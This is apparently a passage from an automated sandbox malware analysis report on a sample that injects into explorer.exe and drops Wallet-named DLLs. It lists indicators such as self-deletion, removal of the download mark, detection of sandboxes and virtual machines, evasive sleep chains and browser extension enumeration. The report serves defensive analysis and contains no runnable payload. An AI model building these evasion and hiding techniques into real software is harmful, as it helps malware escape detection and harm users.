                      Source: Windows.ApplicationModel.Wallet.dll2.13.drStatic PE information: section name: .didat
                      Source: Windows.ApplicationModel.Wallet.dll5.13.drStatic PE information: section name: .didat
                      Source: Windows.ApplicationModel.Wallet.dll6.13.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004032DC push ebp; iretd 0_2_00403485
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004032DC push edx; retn EC8Bh0_2_004035B1
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05C99719 push eax; ret 7_3_05C99725
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBCF98 pushfd ; iretd 7_3_05CBCF99
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBCF98 pushfd ; iretd 7_3_05CBCF99
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBEDA1 push eax; ret 7_3_05CBEDAD
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBEDA1 push eax; ret 7_3_05CBEDAD
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBD10B push eax; retf 7_3_05CBD111
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBD10B push eax; retf 7_3_05CBD111
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBCF1C push edx; iretd 7_3_05CBCF1D
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBCF1C push edx; iretd 7_3_05CBCF1D
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBCF98 pushfd ; iretd 7_3_05CBCF99
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBCF98 pushfd ; iretd 7_3_05CBCF99
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBEDA1 push eax; ret 7_3_05CBEDAD
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBEDA1 push eax; ret 7_3_05CBEDAD
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBD10B push eax; retf 7_3_05CBD111
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBD10B push eax; retf 7_3_05CBD111
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBCF1C push edx; iretd 7_3_05CBCF1D
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_3_05CBCF1C push edx; iretd 7_3_05CBCF1D
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A3B124 push ebp; retf 8_2_00A3B12B
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A3B12C push ebp; retf 8_2_00A3B133
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A3A055 push es; iretd 8_2_00A3A05D
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A347A7 push esp; iretd 8_2_00A347A8
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A34124 push esi; retf 8_2_00A34143
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A340AC push esi; retf 8_2_00A340BB
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A340BC push esi; retf 8_2_00A340C3
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A34001 push esi; retf 8_2_00A34063
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A31405 push esi; ret 8_2_00A31407
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A34084 push esi; retf 8_2_00A3409B
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A34104 push ebp; retf 8_2_00A3411B
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A3409C push ebp; retf 8_2_00A340AB
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: section name: .text entropy: 7.0440254923492915
                      Source: hfetwhc.2.drStatic PE information: section name: .text entropy: 7.0440254923492915
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.muiJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hfetwhcJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hfetwhcJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.LICENSE.txtJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txtJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Deletes itself after installation
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hfetwhc:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,9_2_03223862
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Checks if the current machine is a virtual machine (disk enumeration)
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Contains functionality to compare user and computer (likely to detect sandboxes)
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,9_2_03223862
                      Found evasive API chain (may stop execution after checking mutex)
                      Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_11-884
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeAPI/Special instruction interceptor: Address: 7FFBCB7AE814
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD584
                      Source: C:\Users\user\AppData\Roaming\hfetwhcAPI/Special instruction interceptor: Address: 7FFBCB7AE814
                      Source: C:\Users\user\AppData\Roaming\hfetwhcAPI/Special instruction interceptor: Address: 7FFBCB7AD584
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, hfetwhc.2.drBinary or memory string: SBIEDLLASWHOOKSNXHK^
                      Source: hfetwhc, hfetwhc, 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, hfetwhc, 00000010.00000000.3773952880.0000000000401000.00000080.00000001.01000000.00000005.sdmp, 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, hfetwhc.2.drBinary or memory string: ASWHOOK
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,9_2_03223862
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 484Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2501Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 802Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 351Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1805Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 873Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 4144Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3727Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 4037Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3635Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 2602Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.muiJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_13-8871
                      Source: C:\Windows\explorer.exe TID: 4124Thread sleep count: 484 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 2288Thread sleep count: 2501 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 2288Thread sleep time: -250100s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 2464Thread sleep count: 802 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 2464Thread sleep time: -80200s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 4132Thread sleep count: 313 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 3428Thread sleep count: 335 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 3428Thread sleep time: -33500s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 964Thread sleep count: 351 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 964Thread sleep time: -35100s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 2288Thread sleep count: 1805 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 2288Thread sleep time: -180500s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 6556Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5436Thread sleep count: 4144 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5436Thread sleep time: -4144000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 6016Thread sleep count: 3727 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6016Thread sleep time: -3727000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5212Thread sleep count: 4037 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5212Thread sleep time: -4037000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 6288Thread sleep count: 3635 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6288Thread sleep time: -3635000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5728Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5676Thread sleep count: 2602 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5676Thread sleep time: -1561200000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5676Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\explorer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,7_2_007E2B15
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,7_2_007E1D4A
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,7_2_007E3ED9
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A330A8 FindFirstFileW,FindNextFileW,FindClose,8_2_00A330A8
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032215BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,9_2_032215BE
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032213FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,9_2_032213FE
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032214D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,9_2_032214D8
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C2240 FindFirstFileW,FindNextFileW,FindClose,13_2_030C2240
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C18E0 lstrcatW,lstrcatW,PathCombineW,lstrcatW,PathRemoveFileSpecW,FindFirstFileExW,lstrcmpiW,PathCombineW,PathCombineW,FindNextFileW,FindClose,13_2_030C18E0
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C20C1 FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,13_2_030C20C1
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C1A96 GetTempPathW,GetTempFileNameW,DeleteFileW,PathRemoveExtensionW,StrRChrW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,StrStrIW,SHGetFolderPathW,PathFindFileNameW,PathAppendW,ExpandEnvironmentStringsW,13_2_030C1A96
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E6512 GetSystemInfo,7_2_007E6512
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wu8T4pTb6lB/S4575QEMucJCA6t2SIK8JRkixF4YO6ZIn2ECrfxnkHDBpze1yCdc
                      Source: CB6F.tmp.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: explorer.exe, 0000000D.00000003.3028944586.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3331097674.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2720681255.00000000052D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
